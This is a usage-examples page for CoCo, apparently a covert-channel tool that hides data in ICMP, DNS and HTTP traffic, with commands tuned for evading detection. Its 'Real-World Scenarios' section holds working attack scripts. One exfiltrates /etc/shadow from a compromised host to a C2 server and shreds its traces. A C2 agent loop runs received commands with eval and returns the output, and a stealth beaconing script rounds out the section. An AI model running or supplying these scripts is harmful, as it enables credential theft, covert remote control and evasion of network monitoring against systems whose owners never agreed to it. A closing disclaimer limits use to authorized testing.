Skip to content

EXAMPLES.md

Latest commit

 

History

History
715 lines (561 loc) · 16.6 KB

EXAMPLES.md

File metadata and controls

715 lines (561 loc) · 16.6 KB

CoCo Usage Examples

Practical examples for various operational scenarios using CoCo v0.3.0 advanced features.

Table of Contents

  1. Quick Start Examples
  2. ICMP Mode Examples
  3. Timing Strategy Examples
  4. Traffic Mimicry Examples
  5. Combined Evasion Examples
  6. Real-World Scenarios
  7. Performance Optimization
  8. Troubleshooting Examples

Quick Start Examples

Simple Message Transfer

# Terminal 1: Start listener
sudo coco listen --timeout 30

# Terminal 2: Send message
sudo coco send --target 127.0.0.1 --message "Hello from CoCo"

File Transfer

# Receiver
sudo coco listen --output document.pdf --timeout 120

# Sender
sudo coco send --target 192.168.1.100 --file document.pdf

ICMP Mode Examples

High-Performance Transfer (IP Options)

Best for fast file transfers when moderate stealth is acceptable.

# Send 1MB file quickly (4.5 KB/s)
sudo coco send --target 10.0.0.50 \
    --file data_1mb.bin \
    --icmp-mode ip_options \
    --profile aggressive

# Expected time: ~228 seconds (3.8 minutes)

Bulk Transfer (Timestamp)

Best for large files with good stealth.

# Send 5MB file with timestamp mode (3.7 KB/s, 12 bytes/pkt)
sudo coco send --target 10.0.0.50 \
    --file backup_5mb.tar.gz \
    --icmp-mode timestamp \
    --profile normal

# Expected time: ~1350 seconds (22.5 minutes)

Maximum Stealth (TTL Encoding)

Best for sensitive operations in monitored environments.

# Send classified document with maximum stealth
sudo coco send --target 10.0.0.50 \
    --file classified.pdf \
    --icmp-mode ttl \
    --profile paranoid \
    --timing-strategy exponential

# Slow but extremely stealthy

Tiny Command Delivery (Checksum)

Only for commands <20 bytes where maximum stealth is critical.

# Send ultra-stealth command (WARNING: very slow)
sudo coco send --target 10.0.0.50 \
    --message "GO" \
    --icmp-mode checksum \
    --profile paranoid

# 2-3 bytes: ~4-6 seconds
# 10 bytes: ~20 seconds
# 20 bytes: ~40 seconds
# DO NOT use for larger data!

Balanced Transfer (Fragmentation)

Good balance of speed and stealth.

# Send medium file with fragmentation (2.9 KB/s)
sudo coco send --target 10.0.0.50 \
    --file config_500kb.json \
    --icmp-mode fragmentation \
    --profile normal

# Expected time: ~172 seconds (2.9 minutes)

Size Encoding Example

Moderate stealth with codebook encoding.

# Send with size-based encoding
sudo coco send --target 10.0.0.50 \
    --file data_100kb.bin \
    --icmp-mode size \
    --profile stealth

# Slower but good stealth

Type/Code Encoding Example

Multiple ICMP types for obfuscation.

# Send with type/code encoding
sudo coco send --target 10.0.0.50 \
    --message "Status: All systems operational" \
    --icmp-mode type_code \
    --profile normal

Timing Strategy Examples

Exponential Timing (Recommended)

Realistic network timing that mimics natural packet flow.

# Natural network behavior
sudo coco send --target 10.0.0.50 \
    --file report.pdf \
    --timing-strategy exponential \
    --icmp-mode ip_options

# Packets arrive with realistic exponential delays

Human Behavior Simulation (Normal Distribution)

Mimic human-controlled ping operations.

# Simulate human typing/clicking delays
sudo coco send --target 10.0.0.50 \
    --message "User data" \
    --timing-strategy normal \
    --icmp-mode type_code

# Gaussian distribution around mean delay

Random Intervals (Uniform)

Evenly distributed random timing.

# Unpredictable but bounded timing
sudo coco send --target 10.0.0.50 \
    --file data.bin \
    --timing-strategy uniform \
    --icmp-mode fragmentation

Rare Events (Poisson)

Good for low-rate beaconing.

# Sparse, random timing (good for beacons)
sudo coco send --target 10.0.0.50 \
    --message "Beacon: $(date)" \
    --timing-strategy poisson \
    --icmp-mode ttl

Heavy-Tailed Delays (Pareto)

Occasional very long delays for extra stealth.

# Most packets fast, occasional long delays
sudo coco send --target 10.0.0.50 \
    --file sensitive.doc \
    --timing-strategy pareto \
    --icmp-mode ttl \
    --profile paranoid

Fixed Timing (Testing Only)

Consistent timing - not recommended for production.

# Predictable timing (testing/debugging)
sudo coco send --target 127.0.0.1 \
    --file test.bin \
    --timing-strategy fixed \
    --icmp-mode timestamp

Adaptive Timing (Advanced)

Self-adjusting based on network conditions.

# Automatically adapt to network
sudo coco send --target 10.0.0.50 \
    --file data.bin \
    --timing-strategy adaptive \
    --icmp-mode ip_options

Traffic Mimicry Examples

Mimic Legitimate Ping

Blend with normal network diagnostics.

# Appear as routine ping checks
sudo coco send --target 10.0.0.50 \
    --message "Covert data" \
    --traffic-pattern icmp_ping \
    --icmp-mode type_code \
    --timing-strategy exponential

# Mimics: ping -c 4 10.0.0.50

Mimic Traceroute

Appear as network path tracing.

# Look like traceroute operation
sudo coco send --target 10.0.0.50 \
    --file route_data.bin \
    --traffic-pattern icmp_traceroute \
    --icmp-mode ttl

# Mimics: traceroute 10.0.0.50

Mimic DNS Queries

Blend with DNS traffic.

# Appear as DNS lookups
sudo coco send --mode dns \
    --target example.com \
    --message "Query data" \
    --traffic-pattern dns_query \
    --dns-mode subdomain

# Mimics: dig example.com

Mimic Recursive DNS

Appear as recursive DNS resolution.

# Look like DNS server behavior
sudo coco send --mode dns \
    --target ns.example.com \
    --file dns_data.bin \
    --traffic-pattern dns_recursive

# Mimics: Recursive DNS server queries

Mimic Web Browsing

Blend with HTTP traffic.

# Appear as web browsing
sudo coco send --mode http \
    --target https://example.com \
    --file page.html \
    --traffic-pattern http_browsing

# Mimics: Normal web page loads

Mimic API Calls

Appear as application API traffic.

# Look like REST API calls
sudo coco send --mode http \
    --target https://api.example.com \
    --message '{"key":"value"}' \
    --traffic-pattern http_api \
    --http-mode post

# Mimics: API client requests

Mimic NTP Sync

Appear as time synchronization.

# Look like NTP client
sudo coco send --target 10.0.0.50 \
    --message "Time sync data" \
    --traffic-pattern ntp_sync \
    --icmp-mode size

Combined Evasion Examples

Maximum Stealth Configuration

All evasion techniques combined for extreme stealth.

# Ultimate stealth: TTL + Exponential + Ping mimicry + Paranoid
sudo coco send --target 10.0.0.50 \
    --file ultra_sensitive.pdf \
    --icmp-mode ttl \
    --timing-strategy exponential \
    --traffic-pattern icmp_ping \
    --profile paranoid \
    --encrypt

# Characteristics:
# - TTL encoding: ⭐⭐⭐⭐ stealth, natural-looking TTL variations
# - Exponential timing: Mimics network jitter
# - ICMP ping pattern: Blends with legitimate pings
# - Paranoid profile: Maximum delay randomization
# - Encryption: ChaCha20-Poly1305
# - Estimated: Very slow but extremely hard to detect

Balanced Stealth & Performance

Good stealth without sacrificing too much speed.

# Balanced: Fragmentation + Normal timing + Ping pattern + Stealth
sudo coco send --target 10.0.0.50 \
    --file important.doc \
    --icmp-mode fragmentation \
    --timing-strategy normal \
    --traffic-pattern icmp_ping \
    --profile stealth \
    --encrypt

# Characteristics:
# - Fragmentation: 2.9 KB/s, ⭐⭐ stealth
# - Normal timing: Human-like Gaussian delays
# - ICMP ping pattern: Appears diagnostic
# - Stealth profile: Good evasion
# - Estimated: 100KB in ~35 seconds

Fast with Moderate Stealth

Optimize for speed while maintaining some stealth.

# Fast: IP Options + Uniform timing + Normal profile
sudo coco send --target 10.0.0.50 \
    --file data_1mb.bin \
    --icmp-mode ip_options \
    --timing-strategy uniform \
    --profile normal \
    --encrypt

# Characteristics:
# - IP Options: 4.5 KB/s encode (fastest)
# - Uniform timing: Random but bounded
# - Normal profile: Balanced delays
# - Estimated: 1MB in ~228 seconds (3.8 minutes)

Bulk Transfer Optimized

Maximum speed for large files.

# Bulk: Timestamp + Fixed timing + Aggressive
sudo coco send --target 10.0.0.50 \
    --file backup_10mb.tar.gz \
    --icmp-mode timestamp \
    --timing-strategy fixed \
    --profile aggressive \
    --encrypt

# Characteristics:
# - Timestamp: 12 B/pkt (highest capacity), 3.7 KB/s
# - Fixed timing: Minimal delays
# - Aggressive profile: Maximum throughput
# - Estimated: 10MB in ~45 minutes

Real-World Scenarios

Scenario: Periodic Status Beaconing

Agent sends regular status updates to C2 server.

#!/bin/bash
# beacon.sh - Run on agent system

while true; do
    # Collect status
    HOSTNAME=$(hostname)
    UPTIME=$(uptime -p)
    STATUS="Host:$HOSTNAME|Uptime:$UPTIME|Time:$(date -Iseconds)"
    
    # Send with stealth
    sudo coco send --target 203.0.113.10 \
        --message "$STATUS" \
        --icmp-mode type_code \
        --timing-strategy poisson \
        --traffic-pattern icmp_ping \
        --profile stealth \
        --encrypt
    
    # Random interval (45-75 minutes)
    SLEEP=$((2700 + RANDOM % 1800))
    sleep $SLEEP
done

Scenario: Data Exfiltration

Exfiltrate sensitive file from compromised system.

#!/bin/bash
# exfiltrate.sh

# Target file
FILE="/etc/shadow"
C2_SERVER="203.0.113.50"

# Compress and encrypt locally first
tar czf /tmp/.cache.dat "$FILE"
openssl enc -aes-256-cbc -salt -in /tmp/.cache.dat -out /tmp/.cache.enc -k "secret"

# Send via covert channel
sudo coco send --target $C2_SERVER \
    --file /tmp/.cache.enc \
    --icmp-mode ttl \
    --timing-strategy exponential \
    --traffic-pattern icmp_ping \
    --profile paranoid \
    --encrypt

# Cleanup
shred -u /tmp/.cache.dat /tmp/.cache.enc

Scenario: Remote Command Execution

C2 sends commands, agent executes and returns results.

C2 Server (command sender):

#!/bin/bash
# send_command.sh

AGENT_IP="10.0.0.100"
COMMAND="whoami && id && pwd"

# Send command
sudo coco send --target $AGENT_IP \
    --message "CMD:$COMMAND" \
    --icmp-mode checksum \
    --profile paranoid \
    --encrypt

# Listen for response
sudo coco listen --timeout 300 --output command_result.txt

Agent (command receiver):

#!/bin/bash
# agent.sh - Run continuously

while true; do
    # Listen for commands
    RESULT=$(sudo coco listen --timeout 60 2>/dev/null)
    
    if [[ $RESULT =~ ^CMD: ]]; then
        # Extract and execute command
        CMD="${RESULT#CMD:}"
        OUTPUT=$(eval "$CMD" 2>&1)
        
        # Send results back
        sudo coco send --target 203.0.113.10 \
            --message "RESULT:$OUTPUT" \
            --icmp-mode ttl \
            --timing-strategy exponential \
            --profile stealth
    fi
    
    sleep 5
done

Scenario: File Synchronization

Keep configuration files in sync across systems.

#!/bin/bash
# sync_config.sh

SOURCE_FILE="/etc/app/config.yaml"
DEST_SERVER="10.0.0.50"
CHECKSUM_FILE="/tmp/config.md5"

# Calculate checksum
NEW_CHECKSUM=$(md5sum "$SOURCE_FILE" | cut -d' ' -f1)
OLD_CHECKSUM=$(cat "$CHECKSUM_FILE" 2>/dev/null)

# Sync if changed
if [[ "$NEW_CHECKSUM" != "$OLD_CHECKSUM" ]]; then
    echo "Config changed, syncing..."
    
    sudo coco send --target $DEST_SERVER \
        --file "$SOURCE_FILE" \
        --icmp-mode ip_options \
        --timing-strategy normal \
        --profile normal \
        --encrypt
    
    echo "$NEW_CHECKSUM" > "$CHECKSUM_FILE"
fi

Scenario: Multi-Stage Data Transfer

Transfer large file in stages with verification.

#!/bin/bash
# staged_transfer.sh

LARGE_FILE="database_backup_100mb.sql.gz"
TARGET="10.0.0.50"
CHUNK_SIZE=1048576  # 1MB chunks

# Split file
split -b $CHUNK_SIZE "$LARGE_FILE" /tmp/chunk_

# Transfer each chunk
for chunk in /tmp/chunk_*; do
    echo "Sending $(basename $chunk)..."
    
    # Fast transfer for chunks
    sudo coco send --target $TARGET \
        --file "$chunk" \
        --icmp-mode timestamp \
        --timing-strategy uniform \
        --profile normal \
        --encrypt
    
    # Small delay between chunks
    sleep 30
    
    # Remove sent chunk
    rm "$chunk"
done

echo "Transfer complete"

Performance Optimization

Optimize for Speed

When stealth is less important than throughput.

# Maximum speed configuration
sudo coco send --target 10.0.0.50 \
    --file large_file.bin \
    --icmp-mode ip_options \      # Fastest encode: 4.5 KB/s
    --timing-strategy fixed \      # Minimal delays
    --profile aggressive \         # Fast settings
    --no-encrypt                   # Skip encryption (testing only!)

# For production with encryption:
sudo coco send --target 10.0.0.50 \
    --file large_file.bin \
    --icmp-mode timestamp \        # High capacity: 12 B/pkt
    --timing-strategy fixed \
    --profile aggressive \
    --encrypt

Optimize for Stealth

When avoiding detection is critical.

# Maximum stealth configuration
sudo coco send --target 10.0.0.50 \
    --file sensitive.doc \
    --icmp-mode ttl \              # Best stealth: ⭐⭐⭐⭐
    --timing-strategy pareto \     # Unpredictable delays
    --traffic-pattern icmp_ping \  # Mimic diagnostics
    --profile paranoid \           # Maximum randomization
    --encrypt

Optimize for Reliability

Ensure data arrives intact.

# Reliable transfer configuration
sudo coco send --target 10.0.0.50 \
    --file critical_data.bin \
    --icmp-mode fragmentation \    # Moderate speed, good reliability
    --timing-strategy exponential \ # Network-realistic
    --profile normal \             # Balanced retries
    --encrypt

# Or use hybrid mode for redundancy
sudo coco send --mode hybrid \
    --hybrid-strategy most_reliable \
    --hybrid-channels icmp dns http \
    --target 10.0.0.50 \
    --file critical_data.bin

Troubleshooting Examples

Test Mode Performance

Compare modes to find what works on your network.

#!/bin/bash
# test_modes.sh

TEST_FILE="test_1kb.bin"
TARGET="127.0.0.1"

# Create test file
dd if=/dev/urandom of=$TEST_FILE bs=1024 count=1 2>/dev/null

# Test each mode
for mode in timestamp checksum ttl size type_code ip_options fragmentation; do
    echo "Testing $mode mode..."
    START=$(date +%s)
    
    sudo coco send --target $TARGET --file $TEST_FILE --icmp-mode $mode 2>/dev/null
    
    END=$(date +%s)
    DURATION=$((END - START))
    
    echo "  Time: ${DURATION}s"
    echo ""
done

rm $TEST_FILE

Debug Transmission Issues

Verbose logging to diagnose problems.

# Enable debug mode
sudo coco --debug send --target 10.0.0.50 \
    --file test.bin \
    --icmp-mode timestamp

# Check specific mode behavior
sudo coco send --target 127.0.0.1 \
    --message "Test" \
    --icmp-mode ttl \
    --timing-strategy fixed  # Predictable timing for debugging

Verify Network Path

Test connectivity before covert transfer.

# Check ICMP allowed
ping -c 4 10.0.0.50

# Test basic CoCo connectivity
sudo coco send --target 10.0.0.50 --message "Test" --icmp-mode timestamp

# If fails, try different mode
sudo coco send --target 10.0.0.50 --message "Test" --icmp-mode ip_options

Monitor Transfer Progress

Track long-running transfers.

# In one terminal: send with verbose output
sudo coco --debug send --target 10.0.0.50 --file large.bin --icmp-mode timestamp

# In another terminal: monitor network
sudo tcpdump -i eth0 icmp -n

# Or use system logs
tail -f /var/log/syslog | grep coco

Additional Resources

  • Performance Guide: See docs/PERFORMANCE.md for detailed benchmarks
  • ICMP Modes Reference: See docs/ICMP_MODES.md for technical details
  • Main Usage Guide: See USAGE.md for complete command reference
  • Test Suite: See tests/test_icmp_performance.py for benchmark code

Notes

  • All examples assume CoCo v0.3.0 or later
  • Timing strategies and traffic patterns available in v0.3.0+
  • Advanced ICMP modes (7 total) available in v0.3.0+
  • Performance numbers based on benchmarks (see PERFORMANCE.md)
  • Always test in your environment first
  • Adjust profiles and modes based on your network conditions

Legal Disclaimer

These examples are for authorized security testing and research only. Unauthorized use may violate laws and regulations. Always obtain proper authorization before deployment.